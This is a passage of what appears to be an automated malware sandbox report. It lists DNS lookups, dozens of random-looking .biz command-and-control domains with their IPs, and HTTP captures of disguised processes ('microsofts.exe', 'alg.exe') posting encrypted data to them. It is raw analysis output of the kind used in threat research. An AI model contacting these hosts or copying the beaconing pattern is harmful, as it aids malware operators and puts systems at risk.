                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:49.429039955 CET1.1.1.1192.168.2.50x7045No error (0)zrlssa.biz44.221.84.105A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:49.777406931 CET1.1.1.1192.168.2.50x6544No error (0)kvbjaur.biz54.244.188.177A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:50.462629080 CET1.1.1.1192.168.2.50x647cNo error (0)jlqltsjvh.biz18.141.10.107A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:50.631509066 CET1.1.1.1192.168.2.50x2a6aNo error (0)uphca.biz44.221.84.105A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:51.315350056 CET1.1.1.1192.168.2.50x2200No error (0)fjumtfnz.biz34.211.97.45A (IP address)IN (0x0001)false

                                                                                                                                                                                                                                                                                                                                                                                                              HTTP Request Dependency Graph

                                                                                                                                                                                                                                                                                                                                                                                                              • api.ipify.org
                                                                                                                                                                                                                                                                                                                                                                                                              • pywolwnvd.biz
                                                                                                                                                                                                                                                                                                                                                                                                              • ssbzmoy.biz
                                                                                                                                                                                                                                                                                                                                                                                                              • cvgrf.biz
                                                                                                                                                                                                                                                                                                                                                                                                              • npukfztj.biz
                                                                                                                                                                                                                                                                                                                                                                                                              • przvgke.biz
                                                                                                                                                                                                                                                                                                                                                                                                              • knjghuig.biz
                                                                                                                                                                                                                                                                                                                                                                                                              • lpuegx.biz
                                                                                                                                                                                                                                                                                                                                                                                                              • vjaxhpbji.biz
                                                                                                                                                                                                                                                                                                                                                                                                              • xlfhhhm.biz
                                                                                                                                                                                                                                                                                                                                                                                                              • ifsaia.biz
                                                                                                                                                                                                                                                                                                                                                                                                              • saytjshyf.biz
                                                                                                                                                                                                                                                                                                                                                                                                              • vcddkls.biz
                                                                                                                                                                                                                                                                                                                                                                                                              • fwiwk.biz
                                                                                                                                                                                                                                                                                                                                                                                                              • tbjrpv.biz
                                                                                                                                                                                                                                                                                                                                                                                                              • deoci.biz
                                                                                                                                                                                                                                                                                                                                                                                                              • gytujflc.biz
                                                                                                                                                                                                                                                                                                                                                                                                              • qaynky.biz
                                                                                                                                                                                                                                                                                                                                                                                                              • bumxkqgxu.biz
                                                                                                                                                                                                                                                                                                                                                                                                              • dwrqljrr.biz
                                                                                                                                                                                                                                                                                                                                                                                                              • nqwjmb.biz
                                                                                                                                                                                                                                                                                                                                                                                                              • ytctnunms.biz
                                                                                                                                                                                                                                                                                                                                                                                                              • myups.biz
                                                                                                                                                                                                                                                                                                                                                                                                              • oshhkdluh.biz
                                                                                                                                                                                                                                                                                                                                                                                                              • yunalwv.biz
                                                                                                                                                                                                                                                                                                                                                                                                              • jpskm.biz
                                                                                                                                                                                                                                                                                                                                                                                                              • lrxdmhrr.biz
                                                                                                                                                                                                                                                                                                                                                                                                              • wllvnzb.biz
                                                                                                                                                                                                                                                                                                                                                                                                              • gnqgo.biz
                                                                                                                                                                                                                                                                                                                                                                                                              • jhvzpcfg.biz
                                                                                                                                                                                                                                                                                                                                                                                                              • acwjcqqv.biz
                                                                                                                                                                                                                                                                                                                                                                                                              • vyome.biz
                                                                                                                                                                                                                                                                                                                                                                                                              • yauexmxk.biz
                                                                                                                                                                                                                                                                                                                                                                                                              • iuzpxe.biz
                                                                                                                                                                                                                                                                                                                                                                                                              • sxmiywsfv.biz
                                                                                                                                                                                                                                                                                                                                                                                                              • vrrazpdh.biz
                                                                                                                                                                                                                                                                                                                                                                                                              • ftxlah.biz
                                                                                                                                                                                                                                                                                                                                                                                                              • typgfhb.biz
                                                                                                                                                                                                                                                                                                                                                                                                              • esuzf.biz
                                                                                                                                                                                                                                                                                                                                                                                                              • gvijgjwkh.biz
                                                                                                                                                                                                                                                                                                                                                                                                              • qpnczch.biz
                                                                                                                                                                                                                                                                                                                                                                                                              • brsua.biz
                                                                                                                                                                                                                                                                                                                                                                                                              • dlynankz.biz
                                                                                                                                                                                                                                                                                                                                                                                                              • oflybfv.biz
                                                                                                                                                                                                                                                                                                                                                                                                              • yhqqc.biz
                                                                                                                                                                                                                                                                                                                                                                                                              • mnjmhp.biz
                                                                                                                                                                                                                                                                                                                                                                                                              • opowhhece.biz
                                                                                                                                                                                                                                                                                                                                                                                                              • jdhhbs.biz
                                                                                                                                                                                                                                                                                                                                                                                                              • mgmsclkyu.biz
                                                                                                                                                                                                                                                                                                                                                                                                              • warkcdu.biz
                                                                                                                                                                                                                                                                                                                                                                                                              • gcedd.biz
                                                                                                                                                                                                                                                                                                                                                                                                              • jwkoeoqns.biz
                                                                                                                                                                                                                                                                                                                                                                                                              • xccjj.biz
                                                                                                                                                                                                                                                                                                                                                                                                              • hehckyov.biz
                                                                                                                                                                                                                                                                                                                                                                                                              • rynmcq.biz
                                                                                                                                                                                                                                                                                                                                                                                                              • uaafd.biz
                                                                                                                                                                                                                                                                                                                                                                                                              • eufxebus.biz
                                                                                                                                                                                                                                                                                                                                                                                                              • pwlqfu.biz
                                                                                                                                                                                                                                                                                                                                                                                                              • rrqafepng.biz
                                                                                                                                                                                                                                                                                                                                                                                                              • ctdtgwag.biz
                                                                                                                                                                                                                                                                                                                                                                                                              • tnevuluw.biz
                                                                                                                                                                                                                                                                                                                                                                                                              • whjovd.biz
                                                                                                                                                                                                                                                                                                                                                                                                              • gjogvvpsf.biz
                                                                                                                                                                                                                                                                                                                                                                                                              • reczwga.biz
                                                                                                                                                                                                                                                                                                                                                                                                              • bghjpy.biz
                                                                                                                                                                                                                                                                                                                                                                                                              • damcprvgv.biz
                                                                                                                                                                                                                                                                                                                                                                                                              • ocsvqjg.biz
                                                                                                                                                                                                                                                                                                                                                                                                              • ywffr.biz
                                                                                                                                                                                                                                                                                                                                                                                                              • ecxbwt.biz
                                                                                                                                                                                                                                                                                                                                                                                                              • pectx.biz
                                                                                                                                                                                                                                                                                                                                                                                                              • zyiexezl.biz
                                                                                                                                                                                                                                                                                                                                                                                                              • banwyw.biz
                                                                                                                                                                                                                                                                                                                                                                                                              • wxgzshna.biz
                                                                                                                                                                                                                                                                                                                                                                                                              • zrlssa.biz
                                                                                                                                                                                                                                                                                                                                                                                                              • jlqltsjvh.biz
                                                                                                                                                                                                                                                                                                                                                                                                              • xyrgy.biz
                                                                                                                                                                                                                                                                                                                                                                                                              • htwqzczce.biz
                                                                                                                                                                                                                                                                                                                                                                                                              • kvbjaur.biz
                                                                                                                                                                                                                                                                                                                                                                                                              • uphca.biz

                                                                                                                                                                                                                                                                                                                                                                                                              HTTP Packets

                                                                                                                                                                                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                                                              0192.168.2.54970554.244.188.177801816C:\Users\user\AppData\Local\Temp\microsofts.exe
                                                                                                                                                                                                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:02:51.136552095 CET352OUTPOST /bimwjsl HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                                              Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                                                              Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                              Host: pywolwnvd.biz
                                                                                                                                                                                                                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                                                                                              Content-Length: 828
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:02:51.136552095 CET828OUTData Raw: 96 a0 73 96 08 0f 16 18 30 03 00 00 7e a6 e2 cf ec d9 b7 cf 63 69 a9 50 48 c1 66 1c d0 f5 73 fb 17 b7 4a 25 73 07 81 af 6a 91 5f e9 fb 52 42 bd 5e da 42 d3 d5 6a f3 e5 89 30 fe bb 7b 03 29 c4 fd ed 21 80 4e af 3d 0b c7 42 78 87 c0 af d8 14 9e b0
                                                                                                                                                                                                                                                                                                                                                                                                              Data Ascii: s0~ciPHfsJ%sj_RB^Bj0{)!N=Bxz5=T'M,%zr-"]`0>7#HhLKEKD*?e".J{m~M!}:*~VcMIQ8dh,cHZb
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:02:51.982191086 CET417INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                                                              Server: nginx
                                                                                                                                                                                                                                                                                                                                                                                                              Date: Tue, 05 Nov 2024 16:02:51 GMT
                                                                                                                                                                                                                                                                                                                                                                                                              Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                                                                                                                                                                                              Set-Cookie: btst=f0045f4288f477dccbc97104a277528a|173.254.250.76|1730822571|1730822571|0|1|0; path=/; domain=.pywolwnvd.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                                                                                                                                                                                                                              Set-Cookie: snkz=173.254.250.76; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                                                                                                                                                                                                                                                                              Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                                                              Data Ascii: 0


                                                                                                                                                                                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                                                              1192.168.2.54970618.141.10.107801816C:\Users\user\AppData\Local\Temp\microsofts.exe
                                                                                                                                                                                                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:02:52.034046888 CET347OUTPOST /hmdy HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                                              Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                                                              Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                              Host: ssbzmoy.biz
                                                                                                                                                                                                                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                                                                                              Content-Length: 828
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:02:52.034073114 CET828OUTData Raw: 24 e8 de 29 f4 01 3f 49 30 03 00 00 5b 0a d8 47 05 2b 07 2f cf ff 5a 36 4e 78 a8 7e 03 ba b3 64 71 87 a2 40 d4 06 ff b6 2a 90 f2 63 8e c9 5e 5b dd bd 91 f8 58 59 40 98 4a 7d 5b 58 06 53 07 2f 48 2d 01 a5 ab fc 02 90 7b 97 f1 aa 47 05 5d 91 20 aa
                                                                                                                                                                                                                                                                                                                                                                                                              Data Ascii: $)?I0[G+/Z6Nx~dq@*c^[XY@J}[XS/H-{G] :''?}oO(tmeI<aFNZpn,O[k$,[ew.c}<[vA}?@rzS(@iAxMdt!sW`0y2DT!F!6oG}V6
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:02:53.504396915 CET415INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                                                              Server: nginx
                                                                                                                                                                                                                                                                                                                                                                                                              Date: Tue, 05 Nov 2024 16:02:53 GMT
                                                                                                                                                                                                                                                                                                                                                                                                              Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                                                                                                                                                                                              Set-Cookie: btst=ee7c52bd1d7a84457394048b6915c870|173.254.250.76|1730822573|1730822573|0|1|0; path=/; domain=.ssbzmoy.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                                                                                                                                                                                                                              Set-Cookie: snkz=173.254.250.76; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                                                                                                                                                                                                                                                                              Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                                                              Data Ascii: 0


                                                                                                                                                                                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                                                              2192.168.2.54970754.244.188.177801492C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:02:52.050487995 CET346OUTPOST /p HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                                              Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                                                              Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                              Host: pywolwnvd.biz
                                                                                                                                                                                                                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                                                                                              Content-Length: 778
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:02:52.050487995 CET778OUTData Raw: bf 58 a1 3e ec 80 59 c2 fe 02 00 00 6a 60 4b 75 71 03 3a e6 36 41 7c 37 d1 a6 e6 38 9c 4d 52 43 2a ab 4f 6d 35 61 7a 00 54 f6 68 02 ce af 8c fb 4c 6c a5 a1 f5 b2 5d 9a 01 c6 4b 00 7e 29 0a 14 ee cf 7e 1e f4 bb 70 d8 fd c4 ce 88 a9 14 fd f1 26 fb
                                                                                                                                                                                                                                                                                                                                                                                                              Data Ascii: X>Yj`Kuq:6A|78MRC*Om5azThLl]K~)~p&~-#Kx"*%MF4lF(`8sov]mDlFcB$~W^+ Fk"*}'^gHf#\/FKqYPlo&GPb
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:02:52.881268024 CET417INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                                                              Server: nginx
                                                                                                                                                                                                                                                                                                                                                                                                              Date: Tue, 05 Nov 2024 16:02:52 GMT
                                                                                                                                                                                                                                                                                                                                                                                                              Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                                                                                                                                                                                              Set-Cookie: btst=ac3023501502456f227a9c400e6181d2|173.254.250.76|1730822572|1730822572|0|1|0; path=/; domain=.pywolwnvd.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                                                                                                                                                                                                                              Set-Cookie: snkz=173.254.250.76; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                                                                                                                                                                                                                                                                              Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                                                              Data Ascii: 0


                                                                                                                                                                                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                                                              3192.168.2.54970918.141.10.107801492C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:02:53.067039013 CET350OUTPOST /vrnakrk HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                                              Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                                                              Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                              Host: ssbzmoy.biz
                                                                                                                                                                                                                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                                                                                              Content-Length: 778
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:02:53.067274094 CET778OUTData Raw: 4f 6c cf 64 95 a2 50 b5 fe 02 00 00 39 a0 d1 34 fa 56 90 e0 87 69 0f fe 9b 7a 68 b7 f6 9a 60 65 31 83 e7 3b b8 7d 54 23 b7 1f 76 24 0a 97 47 92 ca 64 0c 2c f7 bd a4 15 85 8e b9 5d 6e 6f c6 8f 64 2a 7c 30 c4 12 9c 73 79 d1 d3 3d 3e cd 74 81 9f f4
                                                                                                                                                                                                                                                                                                                                                                                                              Data Ascii: OldP94Vizh`e1;}T#v$Gd,]nod*|0sy=>tCy=*fGG]2]xMd~@}91u9)$T'0Ba##ZnBQ =U^m{(1|k"qK@(Mp`H]+fOaH1w!P
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:02:54.491164923 CET415INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                                                              Server: nginx
                                                                                                                                                                                                                                                                                                                                                                                                              Date: Tue, 05 Nov 2024 16:02:54 GMT
                                                                                                                                                                                                                                                                                                                                                                                                              Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                                                                                                                                                                                              Set-Cookie: btst=46f14f7fa2241b8ed2f81773e7169f64|173.254.250.76|1730822574|1730822574|0|1|0; path=/; domain=.ssbzmoy.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                                                                                                                                                                                                                              Set-Cookie: snkz=173.254.250.76; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                                                                                                                                                                                                                                                                              Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                                                              Data Ascii: 0


                                                                                                                                                                                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                                                              4192.168.2.54971054.244.188.177801816C:\Users\user\AppData\Local\Temp\microsofts.exe
                                                                                                                                                                                                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:02:53.772322893 CET347OUTPOST /ltaudf HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                                              Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                                                              Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                              Host: cvgrf.biz
                                                                                                                                                                                                                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                                                                                              Content-Length: 828
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:02:53.772322893 CET828OUTData Raw: de 00 7a 98 0c f6 57 0c 30 03 00 00 e5 0a ca 6d 54 d0 ed cb cc 23 0f 42 64 20 f9 83 1e 02 b2 e9 f4 c7 ac e8 78 4d 80 63 d3 c0 45 b2 18 cd 6b 04 ad 4f 77 6d f8 6d 4c e9 f3 9f 72 ba 4a 9f 00 4a 5b 7b 51 99 51 df 47 50 06 c3 50 c6 68 1e 3d d4 0b 78
                                                                                                                                                                                                                                                                                                                                                                                                              Data Ascii: zW0mT#Bd xMcEkOwmmLrJJ[{QQGPPh=x}dC7qK`oPitTE<LC xa%V<d#\%D$Vi$;N[_=w38d*QLpaRBw*^`1B=vE-i5Mg_/l
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:02:54.593645096 CET413INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                                                              Server: nginx
                                                                                                                                                                                                                                                                                                                                                                                                              Date: Tue, 05 Nov 2024 16:02:54 GMT
                                                                                                                                                                                                                                                                                                                                                                                                              Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                                                                                                                                                                                              Set-Cookie: btst=269696fd45ca58ff068548932f2b78e4|173.254.250.76|1730822574|1730822574|0|1|0; path=/; domain=.cvgrf.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                                                                                                                                                                                                                              Set-Cookie: snkz=173.254.250.76; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                                                                                                                                                                                                                                                                              Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                                                              Data Ascii: 0


                                                                                                                                                                                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                                                              5192.168.2.55938844.221.84.105801816C:\Users\user\AppData\Local\Temp\microsofts.exe
                                                                                                                                                                                                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:02:54.776277065 CET352OUTPOST /hadsfcqa HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                                              Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                                                              Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                              Host: npukfztj.biz
                                                                                                                                                                                                                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                                                                                              Content-Length: 828
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:02:54.776551962 CET828OUTData Raw: 7b 45 27 b0 b3 42 80 f7 30 03 00 00 36 9e 17 af 8a 6f f4 b7 15 af 6b ec 31 1e 5d 9d 93 c5 3d c8 cc 69 af fd 42 b7 9a 3c a7 6a 97 de d7 7b b0 6d 74 f7 59 1d a0 39 f4 2d 7f 4d 32 d1 cb cf f8 14 a6 09 c6 f7 72 76 26 d9 af 42 82 f1 18 1c d6 b9 62 b1
                                                                                                                                                                                                                                                                                                                                                                                                              Data Ascii: {E'B06ok1]=iB<j{mtY9-M2rv&BbD[&)%%YM*wZ8;fhuFg@o9y<\QT| Ec5MY;XU-=1k|Wk02c"m4:M,r


                                                                                                                                                                                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                                                              6192.168.2.55938944.221.84.105801816C:\Users\user\AppData\Local\Temp\microsofts.exe
                                                                                                                                                                                                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:02:55.219504118 CET347OUTPOST /jsr HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                                              Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                                                              Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                              Host: npukfztj.biz
                                                                                                                                                                                                                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                                                                                              Content-Length: 828
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:02:55.219504118 CET828OUTData Raw: d2 66 32 a2 8b 14 da dc 30 03 00 00 a7 1f 3d 64 16 ba 3b ac af 38 52 70 a7 e9 a5 67 35 91 e2 85 2f 0d a8 75 10 e0 4c ac f5 85 c5 8a 57 24 f1 c1 65 7e 7a 92 86 3d 9a 8f ba 81 c9 e6 18 d5 f5 78 12 22 37 7c e9 f8 23 64 51 35 19 17 42 87 b6 58 05 c5
                                                                                                                                                                                                                                                                                                                                                                                                              Data Ascii: f20=d;8Rpg5/uLW$e~z=x"7|#dQ5BXI4c:#J%MJT]9;f69}rDUx.P6aVwx;_UX!xQh!L;*_(l2 e]4[7s$
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:02:55.878238916 CET416INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                                                              Server: nginx
                                                                                                                                                                                                                                                                                                                                                                                                              Date: Tue, 05 Nov 2024 16:02:55 GMT
                                                                                                                                                                                                                                                                                                                                                                                                              Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                                                                                                                                                                                              Set-Cookie: btst=54a8c63b51117ccb5cb6b6994bb8bb96|173.254.250.76|1730822575|1730822575|0|1|0; path=/; domain=.npukfztj.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                                                                                                                                                                                                                              Set-Cookie: snkz=173.254.250.76; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                                                                                                                                                                                                                                                                              Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                                                              Data Ascii: 0


                                                                                                                                                                                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                                                              7192.168.2.55939054.244.188.177801492C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:02:55.373518944 CET348OUTPOST /pkljfdj HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                                              Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                                                              Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                              Host: cvgrf.biz
                                                                                                                                                                                                                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                                                                                              Content-Length: 778
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:02:55.373532057 CET778OUTData Raw: 60 c9 8e f0 aa 08 bc e6 fe 02 00 00 eb f5 d2 dd ff ea cb 21 cb 06 1d 12 9e 69 ef c9 e4 ee 3c 51 b7 d2 9d 83 af 5d d3 c2 ed 41 73 a2 10 08 0a af 60 92 d4 7a 7f e4 49 55 53 8b a5 4a 4a cf 19 d5 b0 31 53 a6 fa 79 2d 86 0c b7 e5 44 b9 ac a0 da 67 2b
                                                                                                                                                                                                                                                                                                                                                                                                              Data Ascii: `!i<Q]As`zIUSJJ1Sy-Dg+FxX8vug"cIp*d^lvK Z$-YTERIrnk:ljsdgg2tHDDgL+*`mhz7CNf{a!X
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:02:56.217242002 CET413INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                                                              Server: nginx
                                                                                                                                                                                                                                                                                                                                                                                                              Date: Tue, 05 Nov 2024 16:02:56 GMT
                                                                                                                                                                                                                                                                                                                                                                                                              Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                                                                                                                                                                                              Set-Cookie: btst=f88190172fabc44936b7b1b143c38d95|173.254.250.76|1730822576|1730822576|0|1|0; path=/; domain=.cvgrf.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                                                                                                                                                                                                                              Set-Cookie: snkz=173.254.250.76; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                                                                                                                                                                                                                                                                              Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                                                              Data Ascii: 0


                                                                                                                                                                                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
